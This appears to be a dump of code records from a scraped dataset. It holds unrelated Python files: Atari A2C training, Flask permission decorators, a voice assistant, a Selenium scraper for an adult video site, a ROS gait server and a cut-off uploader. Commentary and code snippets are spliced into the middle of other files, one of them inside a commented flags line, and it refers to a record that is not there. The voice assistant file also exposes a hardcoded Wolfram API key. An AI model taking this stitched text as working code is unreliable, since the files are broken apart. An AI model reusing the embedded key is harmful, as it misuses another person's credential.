flags.FLAGS\n# 环境相关\n\n# flags.DEFINE_enum('pycolab_game', 'key_to_door',\n# ['key_to_door', 'active_visual_match'],\n# 'The name of the game in pycolab environment')\n# flags.DEFINE_integer('pycolab_num_apples', 10,\n# 'Number of apples to sample from the distractor grid.')\n# flags.DEFINE_float('pycolab_apple_reward_min', 1.,\n# 'A reward range [min, max) to uniformly sample from.')\n# flags.DEFINE_float('pycolab_apple_reward_max', 10.,\n# 'A reward range [min, max) to uniformly sample from.')\n# flags.DEFINE_boolean('pycolab_fix_apple_reward_in_episode', True,\n# 'Fix the sampled apple reward within an episode.')\n# flags.DEFINE_float('pycolab_final_reward', 10.,\n# 'Reward obtained at the last phase.')\n# flags.DEFINE_boolean('pycolab_crop', True,\n# 'Whether to crop observations or not.')\n\n# 尝试MsPacman\n# flags.DEFINE_enum('atari_game',\n# 
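The dupFinder record above hashes every file it walks, even files whose sizes are unique. A common refinement is to group by size first and hash only the sizes that collide; the sketch below is mine, not part of the record.

import hashlib
import os
from collections import defaultdict

def hash_file(path, block_size=65536):
    """MD5 of a file, read in blocks so large files stay cheap on memory."""
    h = hashlib.md5()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(block_size), b""):
            h.update(chunk)
    return h.hexdigest()

def find_dups(root):
    """Return lists of paths with identical content under root."""
    by_size = defaultdict(list)
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            by_size[os.path.getsize(path)].append(path)
    by_hash = defaultdict(list)
    for paths in by_size.values():
        if len(paths) > 1:               # only hash potential duplicates
            for path in paths:
                by_hash[hash_file(path)].append(path)
    return [group for group in by_hash.values() if len(group) > 1]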
'MsPacman-v0',\n# 'The name of the game in atari')\n\n# 流程相关\n\nflags.DEFINE_boolean('print_functionname', True,\n 'Whether to print_functionname.')\n\n# 智能体相关\n\nflags.DEFINE_integer('memory_size', 1000,'the number of nodes we are able to store in the graph.')\nflags.DEFINE_integer('memory_word_size', 32,'the lenth of words we are able to store in the graph.')\n\n\ndef main(_):\n if FLAGS.print_functionname == True:\n print(\"Hello world!\")\n\n # 环境初始化\n # env_kwargs = {\n # 'game': FLAGS.pycolab_game,\n # 'num_apples': FLAGS.pycolab_num_apples,\n # 'apple_reward': [FLAGS.pycolab_apple_reward_min,\n # FLAGS.pycolab_apple_reward_max],\n # 'fix_apple_reward_in_episode': FLAGS.pycolab_fix_apple_reward_in_episode,\n # 'final_reward': FLAGS.pycolab_final_reward,\n # 'crop': FLAGS.pycolab_crop\n # }\n # env_kwargs = {\n # 'game': FLAGS.pycolab_game\n # }\n # if FLAGS.print_functionname == True:\n # print(\"env_kwargs: \",env_kwargs)\n # env_builder = pycolab_env.PycolabEnvironment\n # env=env_builder(**env_kwargs) #以字典的形式传递参数,方便函数内部对参数的分别引用\n env = gym.make(\"PooyanDeterministic-v4\")\n # env = gym.make(\"CartPole-v1\")\n # env = gym.make(\"Alien-v0\")\n # ep_length = env.episode_length# 在key_to_door的环境中定义的\n ep_length = 1000\n #num_actions = env.num_actions\n num_actions = env.action_space.n\n observation = env.reset()\n dim_obs = observation.shape\n if FLAGS.print_functionname == True:\n print(\"ep_length\",ep_length,\"num_actions\",num_actions,\"dim_obs\",dim_obs)\n\n # 智能体初始化\n agent = GBMRagent.Agent(num_actions=num_actions,dim_obs=dim_obs,memory_size=FLAGS.memory_size,memory_word_size=FLAGS.memory_word_size)\n # agent.vae_initial()\n #agent.vaev_initial()\n\n ith_episode = 0 \n reward2step =[]\n ep_rews = [0.0]\n while True:\n # 开始新的episode\n ith_episode += 1\n if FLAGS.print_functionname == True:\n print(\"ith_episode\", ith_episode)\n \n observation = env.reset()\n print(\"obs shape\",observation.shape)\n observation = observation.reshape(1, observation.shape[1]*observation.shape[2]*observation.shape[0]).astype('float32') / 255\n #state = agent.obs2state(observation)\n observations =[]\n rewards =[]# 这个后来要用来算v值做监督信号\n epshistory = agent.EpsHistory_Initial()\n ep_rews.append(0.0)\n values =[]\n dones=[]\n actions=[]\n #states =[]\n # 环境交互\n for tt in range(ep_length):\n # if FLAGS.print_functionname == True:\n # print(\"jth_step\",tt)\n #action = agent.TakeRandomAction()\n #action, readinfo = agent.infer(state,epshistory)\n #action = agent.inferModelfree(state)\n #action,value=agent.a2cmodel.action_value(state)\n #action,value=agent.a2cmodel.action_value(observation)\n if np.random.uniform() < 0.7:\n action,value=agent.a2cmodel.action_value(observation)\n else:\n # choose random action\n action = np.random.choice(list(range(num_actions)))\n value = [0]\n observation_, reward,done,info = env.step(action)\n #print(\"info\",info)\n if info['ale.lives']<3:\n done = True\n reward = -50\n env.render()\n observation_ = observation_.reshape(1, observation_.shape[1]*observation_.shape[2]*observation_.shape[0]).astype('float32') / 255\n #state_ = agent.obs2state(observation_)\n #epshistory = agent.EpsHistory_add([state,action,reward,state_])\n observation= observation_\n #state= state_\n observations.append(observation)\n rewards.append(reward)\n values.append(value)\n dones.append(done)\n actions.append(action)\n #states.append(state)\n reward2step.append(reward)\n ep_rews[-1] += reward\n if done:\n break\n logging.info(\"Episode: %03d, Reward: %05d\" % (len(ep_rews)-1, ep_rews[-1]))\n # 记忆重构\n 
# agent.Memory_update(epshistory)\n # agent.Memory_abstract()\n # agent.Memory_reconstruct()\n # a2c 的训练\n #print(\"ep_rews\",ep_rews)#只有一个数\n rewards = np.stack(rewards)\n dones = np.stack(dones)\n values = np.stack(values)\n actions = np.stack(actions)\n #print(\"states\",states)\n #states = np.stack(states)\n values= np.squeeze(values)\n observations = np.stack(observations)\n observations = np.squeeze(observations)\n #states = np.squeeze(states)\n #print(\"rewards\",rewards,\"dons\",dones,\"values\",values,\"actions\",actions,\"states\",states)\n \n _, next_value = agent.a2cmodel.action_value(observation_)\n returns, advs = agent._returns_advantages(rewards, dones, values, next_value)\n acts_and_advs = np.concatenate([actions[:,None], advs[:,None]], axis=-1)\n #print(\"next_value\",next_value,\"returns\",returns,\"advs\",advs,\"advs,acts_and_advs\",acts_and_advs)\n a2closses = agent.a2cmodel.train_on_batch(observations, [acts_and_advs, returns])\n logging.info(\"[%d/%d] Losses: %s\" % (ith_episode+1, ith_episode, a2closses))\n # _, next_value = agent.a2cmodel.action_value(state_[None, :])\n # returns, advs = agent._returns_advantages(rewards, dones, values, next_value)\n # acts_and_advs = np.concatenate([actions[:, None], advs[:, None]], axis=-1)\n # a2closses = agent.a2cmodel.train_on_batch(states, [acts_and_advs, returns])\n # logging.debug(\"[%d/%d] Losses: %s\" % (ith_episode+1, ith_episode, a2closses))\n \n # 训练参数\n # observations = np.stack(observations)\n # rewards = np.stack(rewards)\n # print(\"obs shape\",observations.shape)\n # # input_train = observations.reshape(ep_length, observations.shape[1]*observations.shape[2]*observations.shape[3]).astype('float32') / 255 \n # # rewards = rewards.reshape(ep_length,1).astype('float32') / 255 \n # input_train = observations.reshape(tt+1, observations.shape[1]*observations.shape[2]*observations.shape[3]).astype('float32') / 255 \n # rewards = rewards.reshape(tt+1,1).astype('float32') / 255 \n # agent.vaev_train(input_train,rewards,epochs =2, batch_size =64)\n # agent.train_agg()\n #if len(reward2step)%10==0:\n print(\"write current data\",len(reward2step))\n np.save(\"rewstep.npy\",reward2step)\n \n\nif __name__ == '__main__':\n with tf.device('/gpu:0'):\n app.run(main)\n","sub_path":"Base/run_MsPacman_a2c_nostate.py","file_name":"run_MsPacman_a2c_nostate.py","file_ext":"py","file_size_in_byte":8458,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"91183741","text":"from PyQt5.QtWidgets import QComboBox\nfrom PyQt5.QtCore import pyqtSignal\nfrom PyQt5.QtCore import QVariant\nfrom PyQt5.QtWidgets import QListWidgetItem\n\nclass ProcedureComboBox(QComboBox):\n def __init__(self, parent):\n\n QComboBox.__init__(self, parent)\n\n\n self.activated.connect(self.itemActivated)\n\n def init(self, procedureService, measurementService, uiMessenger):\n\n self.procedureService = procedureService\n self.measurementService = measurementService\n self.uiMessenger = uiMessenger\n\n for procedure in self.procedureService.procedures:\n self.addItem(procedure.name, procedure)\n\n\n def itemActivated(self, id):\n procedure = self.currentData()\n self.uiMessenger.parameterListActivateProcedure.emit(procedure)\n self.measurementService.labelPlot.emit(procedure.getPlotSetup())","sub_path":"Controllers/ProcedureComboBox.py","file_name":"ProcedureComboBox.py","file_ext":"py","file_size_in_byte":860,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} 
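The run_MsPacman script above calls agent._returns_advantages(rewards, dones, values, next_value), whose body is not included in this record. A conventional A2C formulation of that function looks like the sketch below; the discount factor and the exact array shapes are assumptions on my part.

import numpy as np

def returns_advantages(rewards, dones, values, next_value, gamma=0.99):
    """Discounted returns bootstrapped from next_value, plus advantages."""
    returns = np.append(np.zeros_like(rewards, dtype=np.float64), next_value)
    for t in reversed(range(len(rewards))):
        # drop the bootstrap term where the episode terminated at step t
        returns[t] = rewards[t] + gamma * returns[t + 1] * (1 - dones[t])
    returns = returns[:-1]
    return returns, returns - np.asarray(values, dtype=np.float64)

rets, advs = returns_advantages(
    rewards=np.array([1.0, 0.0, 1.0]),
    dones=np.array([0, 0, 1]),
    values=np.array([0.5, 0.4, 0.6]),
    next_value=0.7,
)
print(rets)  # approximately [1.9801 0.99 1.]
print(advs)  # approximately [1.4801 0.59 0.4]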
+{"seq_id":"361102515","text":"\ndef solution(id_list, k):\n customers = {}\n\n for cus in id_list:\n cus = set(cus.split())\n\n for c in cus:\n if c not in customers.keys():\n customers[c] = 1\n\n elif customers[c] < k:\n customers[c] += 1\n return sum(customers.values())\n\n\nif __name__ == \"__main__\":\n print(solution([\"A B C D\", \"A D\", \"A B D\", \"B D\"], 2))\n","sub_path":"naver-hackday-2020/02.py","file_name":"02.py","file_ext":"py","file_size_in_byte":393,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"564847484","text":"import sys, os\nfrom cx_Freeze import setup, Executable\n\ndata_dirs = ['KEY_BNC', 'Data']\n\n# Dependencies are automatically detected, but it might need fine tuning.\nbuild_exe_options = {\"packages\": [\"os\"],\n \"excludes\": ['tk', '_tkagg', '_gtkagg', '_gtk', 'tcl'],\n \"include_files\": [os.path.join(data_dirs[0], data_dirs[1])]}\n\n# GUI applications require a different base on Windows (the default is for a\n# console application).\nbase = None\nif sys.platform == \"win32\":\n base = \"Win32GUI\"\n\nsetup( name = \"KEY_BNC\",\n version = \"0.1\",\n description = \"My GUI application!\",\n options = {\"build_exe\": build_exe_options},\n executables = [Executable(\"KEY_BNC_app.py\", base=base)])\n","sub_path":"setup_win.py","file_name":"setup_win.py","file_ext":"py","file_size_in_byte":741,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"279916763","text":"\n\nfrom flask import request\n\n#from ecrdb import *\nimport ecrdb\n\nfrom error_response import ErrorResponse\n\nfrom http import HTTPStatus\n\n\ndef login_required(func):\n def wrapper2(self, **kwargs):\n authenticated = request.environ['authenticated']\n if not authenticated:\n raise ErrorResponse('Not authenticated', status_code=HTTPStatus.UNAUTHORIZED)\n\n #if len(args) == 0:\n # return func(self)\n \n\n return func(self, **kwargs)\n \n return wrapper2\n\n\n\ndef has_permission(*permissions):\n def real_decorator(func):\n def wrapper(self, app_id):\n \n\n authenticated = request.environ['authenticated']\n\n ecr_db = ecrdb.EcrDB()\n\n\n if not authenticated:\n if not (ecr_db.hasPermission(app_id, \"GROUP\", \"AllUsers\" , permissions)):\n raise ErrorResponse(f'Not authorized.', status_code=HTTPStatus.UNAUTHORIZED)\n\n requestUser = request.environ.get('user', \"\")\n isAdmin = request.environ.get('admin', False)\n\n\n if (isAdmin or ecr_db.hasPermission(app_id, \"USER\", requestUser ,permissions)):\n return func(self, app_id)\n\n raise ErrorResponse(f'Not authorized.', status_code=HTTPStatus.UNAUTHORIZED)\n\n\n \n \n return wrapper\n return real_decorator\n\n\n","sub_path":"decorators.py","file_name":"decorators.py","file_ext":"py","file_size_in_byte":1357,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"472114566","text":"from __init__ import *\r\n\r\n\r\ndef wolfquery(question):\r\n if question.lower().startswith('wolfram'):\r\n question = question[8:]\r\n client = wolframalpha.Client('R33RAT-7QTK4AL8LL')\r\n res = client.query(question)\r\n try:\r\n return next(res.results).text\r\n except StopIteration:\r\n try:\r\n answers = ' '.join([each_answer.text for each_answer in res.pods if each_answer])\r\n except TypeError:\r\n answers = None\r\n if answers:\r\n return answers\r\n return \"Sorry, Wolfram doesn't know the answer.\"\r\n\r\n\r\ndef say(message, title='Speak', speech_system='google', say=True, lang='en'):\r\n if 
speech_system == 'google':\r\n # Create the MP3 file which will speak the text\r\n folder = ''\r\n if '\\\\' in title:\r\n folder = '\\\\'.join(title.split('\\\\')[:-1])\r\n title += '.mp3'\r\n tts = gTTS(message, lang=lang)\r\n path = home+'\\\\'+title\r\n folder_path = home + \"\\\\\" + folder\r\n if not os.path.exists(folder_path):\r\n os.makedirs(folder_path)\r\n tts.save(path)\r\n if say:\r\n call(\"start /MIN {}\".format(home+'\\\\'+title), shell=True)\r\n else:\r\n # Create the Visual Basic code which will speak the text\r\n with open(title + '.vbs', 'w') as file:\r\n file.write(\r\n \"\"\"\r\n speaks=\"{}\"\r\n Dim speaks, speech\r\n Set speech=CreateObject(\"sapi.spvoice\")\r\n speech.Speak speaks\r\n \"\"\"\r\n .format(\r\n str(message).replace('\"', '').replace('\\n', '')))\r\n # Execute the file\r\n call(['cscript.exe', title + '.vbs'])\r\n\r\n\r\ndef ask_google():\r\n print(\"Please speak now\")\r\n with m as source:\r\n audio = r.listen(source)\r\n print(\"Processing audio\")\r\n try:\r\n return r.recognize_google(audio)\r\n except sr.UnknownValueError: # speech is unintelligible\r\n return \"GSR Could not understand audio\"\r\n except sr.RequestError:\r\n return \"Could not request results from Google Speech Recognition service\"\r\n\r\n\r\ndef query(input_type):\r\n resampler = apiai.Resampler(source_samplerate=RATE)\r\n request = None\r\n \r\n vad = apiai.VAD()\r\n\r\n if input_type == 'local':\r\n print(\"Local Speech Recognition\")\r\n request = ai.voice_request()\r\n \r\n def callback(in_data, frame_count, time_info, status):\r\n frames, data = resampler.resample(in_data, frame_count)\r\n if show_decibels:\r\n decibel = 20 * log(audioop.rms(data, 2)+1, 10)\r\n print(decibel)\r\n state = vad.processFrame(frames)\r\n request.send(data)\r\n\r\n if state == 1:\r\n return in_data, pyaudio.paContinue\r\n else:\r\n return in_data, pyaudio.paComplete\r\n\r\n p = pyaudio.PyAudio()\r\n \r\n stream = p.open(format=FORMAT,\r\n channels=CHANNELS,\r\n rate=RATE,\r\n input=True,\r\n output=False,\r\n frames_per_buffer=CHUNK,\r\n stream_callback=callback)\r\n\r\n stream.start_stream()\r\n \r\n print (\"Speak!\")\r\n \r\n try:\r\n while stream.is_active():\r\n time.sleep(0.1)\r\n except Exception as e:\r\n raise e\r\n except KeyboardInterrupt:\r\n pass\r\n \r\n stream.stop_stream()\r\n stream.close()\r\n p.terminate()\r\n elif input_type == 'google':\r\n print(\"Google's speech recognition\")\r\n request = ai.text_request()\r\n request.query = ask_google()\r\n else:\r\n request = ai.text_request()\r\n try:\r\n request.query = input(\"Input your query: \")\r\n except KeyboardInterrupt:\r\n raise SystemExit\r\n print (\"Wait for response...\")\r\n response = request.getresponse()\r\n response = response.read()\r\n\r\n try:\r\n response = eval(response.decode('UTF-8'))\r\n except NameError:\r\n response = {'result':{'fulfillment':{'speech':\" \"}, 'action': \"None\", 'resolvedQuery': \"UNKNOWN\"}}\r\n return response\r\n\r\n\r\ndef listen(input_type = 'google'):\r\n action = \"None\"\r\n response = query(input_type)['result']\r\n reply = response['fulfillment']['speech']\r\n question = response['resolvedQuery']\r\n print(\"You said: \" + question)\r\n action = response['action']\r\n \r\n return action, question, reply\r\n\r\n\r\ndef wolf(question):\r\n answer = wolfquery(question)\r\n answer = answer.replace('\\n', '; ').replace('~~', ' or about ')\r\n try:\r\n answer = answer[answer.index('=')+1:]\r\n except ValueError:\r\n pass\r\n return answer\r\n\r\n\r\ndef causality(action):\r\n 
return {\r\n \"manage.app_close\": manage.app_close,\r\n \"input.unknown\": wolf,\r\n \"wisdom.unknown\": wolf,\r\n }.get(action, wolf)\r\n","sub_path":"Py/Py3/Functional/Assistant/actions.py","file_name":"actions.py","file_ext":"py","file_size_in_byte":5037,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"76187236","text":"import re\nimport urllib.request\nfrom selenium.common import exceptions\nfrom .. import common\nfrom .. import db\nfrom .. import data\n\n\nclass Mgs:\n\n def __init__(self):\n self.main_url = 'https://www.mgstage.com/product/product_detail/'\n self.opener = urllib.request.build_opener()\n self.opener.addheaders = [('User-Agent',\n 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1941.0 Safari/537.36')]\n\n self.env = common.Environment()\n self.driver = self.env.get_driver()\n self.import_dao = db.import_dao.ImportDao()\n\n def __get_info_from_chrome(self, product_number, url: str = ''):\n\n if len(url) > 0:\n self.driver.get(url)\n else:\n self.driver.get(self.main_url + product_number + '/')\n\n detail = ''\n sell_date = ''\n h2 = None\n try:\n h2 = self.driver.find_element_by_tag_name('h2')\n except exceptions.NoSuchElementException:\n print('h2 tag not found exceptions.NoSuchElementException')\n\n if h2 is None:\n print('h2 tag none')\n return None\n\n if h2.text == '年齢認証':\n over18yes = self.driver.find_element_by_tag_name('li')\n # over18yes = self.driver.find_element_by_id('id')\n over18yes.click()\n\n h1 = None\n try:\n h1 = self.driver.find_element_by_css_selector('.tag')\n except exceptions.NoSuchElementException:\n print('h1 tag not found exceptions.NoSuchElementException')\n\n site_data = data.SiteData()\n if h1 != None:\n site_data.title = h1.text\n\n # 存在しない品番の場合は、forをそのままスルー、空文字でリターンされる\n for tr_tag in self.driver.find_elements_by_tag_name('tr'):\n\n try:\n th_tag = tr_tag.find_element_by_tag_name('th')\n except:\n th_tag = None\n\n if not th_tag:\n continue\n\n if re.search('出演', th_tag.text):\n td_tag = tr_tag.find_element_by_tag_name('td')\n site_data.actress = td_tag.text\n # detail += td_tag.text + '、'\n if re.search('メーカー', th_tag.text):\n td_tag = tr_tag.find_element_by_tag_name('td')\n site_data.maker = td_tag.text\n # detail += td_tag.text + '、'\n if re.search('収録時間', th_tag.text):\n td_tag = tr_tag.find_element_by_tag_name('td')\n site_data.duration = td_tag.text\n if re.search('品番', th_tag.text):\n td_tag = tr_tag.find_element_by_tag_name('td')\n site_data.productNumber = td_tag.text\n if re.search('配信開始日', th_tag.text):\n td_tag = tr_tag.find_element_by_tag_name('td')\n site_data.streamDate = td_tag.text\n if re.search('商品発売日', th_tag.text):\n td_tag = tr_tag.find_element_by_tag_name('td')\n site_data.sellDate = td_tag.text\n if re.search('シリーズ', th_tag.text):\n td_tag = tr_tag.find_element_by_tag_name('td')\n site_data.series = td_tag.text\n if re.search('レーベル', th_tag.text):\n td_tag = tr_tag.find_element_by_tag_name('td')\n site_data.label = td_tag.text\n\n # detail += title\n\n return site_data\n\n def get_info(self, product_number, url: str = ''):\n\n return self.__get_info_from_chrome(product_number, url)\n\n def exist_product_number(self, product_number):\n\n self.driver.get(self.main_url + product_number + '/')\n\n h2 = None\n try:\n h2 = self.driver.find_element_by_tag_name('h2')\n except exceptions.NoSuchElementException:\n print('h2 tag not found exceptions.NoSuchElementException')\n\n if h2 is None:\n print('h2 tag none')\n return 
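The causality() function above is the dict-dispatch idiom: map action strings to handler functions and fall back with dict.get instead of a long if/elif chain. A self-contained version of the same idiom, with handlers made up for the demo:

def wolf(question):
    return "wolfram fallback for: " + question

def app_close(question):
    return "closing app"

HANDLERS = {
    "manage.app_close": app_close,
    "input.unknown": wolf,
    "wisdom.unknown": wolf,
}

def dispatch(action, question):
    # dict.get with a default handler replaces the if/elif chain
    return HANDLERS.get(action, wolf)(question)

print(dispatch("manage.app_close", ""))   # closing app
print(dispatch("anything.else", "2+2"))   # wolfram fallback for: 2+2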
False\n\n if h2.text == '年齢認証':\n over18yes = self.driver.find_element_by_tag_name('li')\n # over18yes = self.driver.find_element_by_id('id')\n over18yes.click()\n\n try:\n h1 = self.driver.find_element_by_css_selector('.tag')\n except exceptions.NoSuchElementException:\n print('h1 tag not found exceptions.NoSuchElementException')\n return False\n\n # 存在しない品番の場合は、forをそのままスルー、空文字でリターンされる\n for tr_tag in self.driver.find_elements_by_tag_name('tr'):\n return True\n\n return False\n\n def test_execute(self):\n\n imports = self.import_dao.get_all()\n if len(imports) > 0:\n for one_data in imports:\n detail, sell_date = self.get_info(one_data.productNumber)\n if len(sell_date) > 0:\n print(one_data.copy_text)\n print(detail)\n print('')\n self.import_dao.update_detail_and_sell_date(detail, sell_date, one_data.id)\n\n\nif __name__ == '__main__':\n\n mgs = Mgs()\n # detail, sell_date = mgs.get_info('277DCV-093')\n detail, sell_date = mgs.test_execute()\n # print(' [' + str(sell_date) + '] ' + detail)\n\n","sub_path":"src/site/mgs.py","file_name":"mgs.py","file_ext":"py","file_size_in_byte":5368,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"184947989","text":"from tkinter import *\n\nraiz= Tk()\nraiz.title(\"VENTANA DE PRUEBA\")\nraiz.resizable(1,1)\n#raiz.geometry(\"600x300\")\nraiz.config(bg= \"green\") #bg = background\n# Aqui se crea el Frame\nframePrincipal= Frame(raiz)\nframePrincipal.pack(side= \"left\", anchor= \"s\") #para ubicar el frame en alguna posicion (derecha,izquierda)\nframePrincipal.config(width= \"600\", height= \"350\")\nframePrincipal.config(bg= \"red\")\nframePrincipal.config(bd= 20) #bd= border\nframePrincipal.config(relief = \"groove\")\nframePrincipal.config(cursor= \"hand2\")\n\n#Aqui se introducen label, cuadro txt\n\nlabelMenu = Label(framePrincipal,text= \"Menú Principal\",fg=\"blue\",font=(18)).grid(row= 0, column= 2)\nlabelAdminFrase = Label(framePrincipal,text= \"Boton-->\",fg=\"black\",font=(12)).grid(row= 3, column= 0,sticky= \"e\",padx=10,pady=10)\n#txtAdminFrase = Entry(framePrincipal,fg=\"black\",font=(12)).grid(row= 3, column= 1) #fg:color letra\nlabelAdminJuego = Label(framePrincipal,text= \"Boton-->\",fg=\"black\",font=(12)).grid(row= 3, column= 2,sticky= \"e\",padx=10,pady=10)\n#txtAdminJuego = Entry(framePrincipal,fg=\"black\",font=(12)).grid(row= 3, column= 3,padx=10,pady=10) #fg:color letra\nlabelAdminJugadores = Label(framePrincipal,text= \"Boton-->\",fg=\"black\",font=(12)).grid(row= 4, column= 0,sticky= \"e\",padx=10,pady=10)\n#txtAdminJugadores = Entry(framePrincipal,fg=\"black\",font=(2)).grid(row= 4, column= 1) #fg:color letra\nlabelsalir = Label(framePrincipal,text= \"Boton-->\",fg=\"black\",font=(12)).grid(row= 4, column= 2,sticky= \"e\",padx=10,pady=10)\n#txtSalir = Entry(framePrincipal,fg=\"black\",font=(12)).grid(row= 4, column= 3,padx=10,pady=10) #fg:color letra\n\n#Aquis se agregan botones\nbotonAdminFrase = Button(framePrincipal,text= \"Admin Frases\").grid(row= 3, column= 1)\nbotonAdminJuego = Button(framePrincipal,text= \"Admin Juego\").grid(row= 3, column= 3,padx=10,pady=10)\nbotonAdminJugadores = Button(framePrincipal,text= \"Admin Jugadores\").grid(row= 4, column= 1)\nbotonsalir = Button(framePrincipal,text= \"Salir\").grid(row= 4, column= 
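The mgs.py scraper above repeats "if re.search(label, th_tag.text)" once per field. A table-driven loop over (attribute, label) pairs keeps the mapping in one place; this is a sketch only, reusing a few labels that appear in the record.

import re

FIELD_PATTERNS = {
    "actress": "出演",
    "maker": "メーカー",
    "duration": "収録時間",
    "productNumber": "品番",
}

def parse_rows(rows):
    """rows: iterable of (th_text, td_text) pairs scraped from the table."""
    data = {}
    for th_text, td_text in rows:
        for attr, label in FIELD_PATTERNS.items():
            if re.search(label, th_text):
                data[attr] = td_text
                break
    return data

print(parse_rows([("品番", "ABC-123"), ("収録時間", "120min")]))
# {'productNumber': 'ABC-123', 'duration': '120min'}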
3,padx=10,pady=10)\n\n\nraiz.mainloop()","sub_path":"VistasAhorcado/pruebaInterfaz.py","file_name":"pruebaInterfaz.py","file_ext":"py","file_size_in_byte":2027,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"523689710","text":"import actionlib\nimport rospy\n\nfrom march_gait_selection.dynamic_gaits.transition_subgait import TransitionSubgait\nfrom march_shared_resources.msg import GaitAction, GaitGoal, GaitNameAction\n\nSERVER_TIMEOUT = 5\nRESPONSE_TIMEOUT = 1\n\n\nclass PerformGaitAction(object):\n def __init__(self, gait_selection):\n self.gait_selection = gait_selection\n self.action_server = actionlib.SimpleActionServer('/march/gait/perform', GaitNameAction,\n execute_cb=self.target_gait_callback,\n auto_start=False)\n self.action_server.start()\n self.schedule_gait_client = actionlib.SimpleActionClient('/march/gait/schedule', GaitAction)\n\n while not rospy.is_shutdown() and not self.schedule_gait_client.wait_for_server(rospy.Duration(SERVER_TIMEOUT)):\n rospy.logdebug('Waiting for /march/gait/schedule to come up')\n\n def target_gait_callback(self, subgait_goal_msg):\n \"\"\"Set a new target subgait over the action server march/gait/schedule.\"\"\"\n rospy.logdebug('Trying to schedule subgait {gn} {sn}'\n .format(gn=subgait_goal_msg.name, sn=subgait_goal_msg.subgait_name))\n\n gait = self.gait_selection[subgait_goal_msg.name]\n if gait:\n subgait = gait[subgait_goal_msg.subgait_name]\n if subgait:\n if subgait_goal_msg.old_name:\n old_gait_name = subgait_goal_msg.old_name\n gait_name = subgait_goal_msg.name\n subgait_name = subgait_goal_msg.subgait_name\n rospy.logdebug('Create with old gait: {og}, gait: {ng}, subgait: {sg}'\n .format(og=old_gait_name, ng=gait_name, sg=subgait_name))\n subgait = TransitionSubgait.from_subgait_names(self.gait_selection, old_gait_name,\n gait_name, subgait_name)\n trajectory_state = self.schedule_gait(subgait_goal_msg.name, subgait)\n\n if trajectory_state == actionlib.GoalStatus.SUCCEEDED:\n self.action_server.set_succeeded(trajectory_state)\n else:\n self.action_server.set_aborted(trajectory_state)\n\n return True\n\n rospy.logwarn('Gait {gn} with subgait {sn} does not exist in parsed gaits'\n .format(gn=subgait_goal_msg.name, sn=subgait_goal_msg.subgait_name))\n\n self.action_server.set_aborted('Gait {gn} with subgait {sn} does not exist in parsed gaits'\n .format(gn=subgait_goal_msg.name, sn=subgait_goal_msg.subgait_name))\n\n return False\n\n def schedule_gait(self, gait_name, subgait):\n \"\"\"Construct the goal message and send.\"\"\"\n gait_action_goal = GaitGoal()\n gait_action_goal.gait_name = gait_name\n gait_action_goal.subgait_name = subgait.subgait_name\n gait_action_goal.version = subgait.version\n gait_action_goal.gait_type = subgait.gait_type\n gait_action_goal.duration = rospy.Duration.from_sec(subgait.duration)\n gait_action_goal.trajectory = subgait.to_joint_trajectory_msg()\n\n self.schedule_gait_client.send_goal(gait_action_goal)\n self.schedule_gait_client.wait_for_result(timeout=gait_action_goal.duration + rospy.Duration(RESPONSE_TIMEOUT))\n\n return self.schedule_gait_client.get_state()\n","sub_path":"march_gait_selection/src/march_gait_selection/perform_gait_action.py","file_name":"perform_gait_action.py","file_ext":"py","file_size_in_byte":3504,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"207611720","text":"import os\nimport subprocess\nimport json\n\ndef get_setup_py_data(dirname):\n dirpath = 
os.path.dirname(os.path.realpath(__file__))\n cmd='python '+dirpath+'/print_setup_py_data.py'\n result = subprocess.run(cmd.split(), stdout=subprocess.PIPE, stderr=subprocess.PIPE, cwd=dirname)\n if result.stderr:\n print(result.stderr)\n if not result.stdout:\n return None\n obj=json.loads(result.stdout.decode())\n return obj","sub_path":"releasetools/mlstatus/docker/mlstatus/get_setup_py_data.py","file_name":"get_setup_py_data.py","file_ext":"py","file_size_in_byte":439,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"355495562","text":"#!/usr/bin/env python3\n\nimport os\nimport os.path\nimport pickle\nimport shutil\nimport subprocess\nimport sys\nimport time\nimport traceback\nfrom pprint import pprint\n\nimport owncloud\nfrom web3.logs import DISCARD\n\nimport broker.config as config\nimport broker.libs.git as git\nfrom broker.config import env, logging\nfrom broker.lib import get_tx_status, run\nfrom broker.utils import (\n CacheType,\n StorageID,\n _colorize_traceback,\n cd,\n compress_folder,\n log,\n popen_communicate,\n print_ok,\n sleep_timer,\n terminate,\n)\nfrom contract.scripts.lib import Job, cost\n\n\ndef _upload_results(encoded_share_token, output_file_name):\n \"\"\"Uploads results into Eudat using curl\n doc:\n - (How to upload files into shared b2drop.eudat(owncloud) repository using curl?)[https://stackoverflow.com/a/44556541/2402577]\n\n - https://stackoverflow.com/a/24972004/2402577\n cmd:\n curl -X PUT -H \\'Content-Type: text/plain\\' -H \\'Authorization: Basic \\'$encoded_share_token\\'==\\' \\\n --data-binary \\'@result-\\'$providerID\\'-\\'$index\\'.tar.gz\\' https://b2drop.eudat.eu/public.php/webdav/result-$providerID-$index.tar.gz\n\n curl --fail -X PUT -H 'Content-Type: text/plain' -H 'Authorization: Basic 'SjQzd05XM2NNcFoybk.Write'==' --data-binary\n '@0b2fe6dd7d8e080e84f1aa14ad4c9a0f_0.txt' https://b2drop.eudat.eu/public.php/webdav/result.txt\n \"\"\"\n cmd = [\n \"curl\",\n \"--fail\",\n \"-X\",\n \"PUT\",\n \"-H\",\n \"Content-Type: text/plain\",\n \"-H\",\n f\"Authorization: Basic {encoded_share_token}\",\n 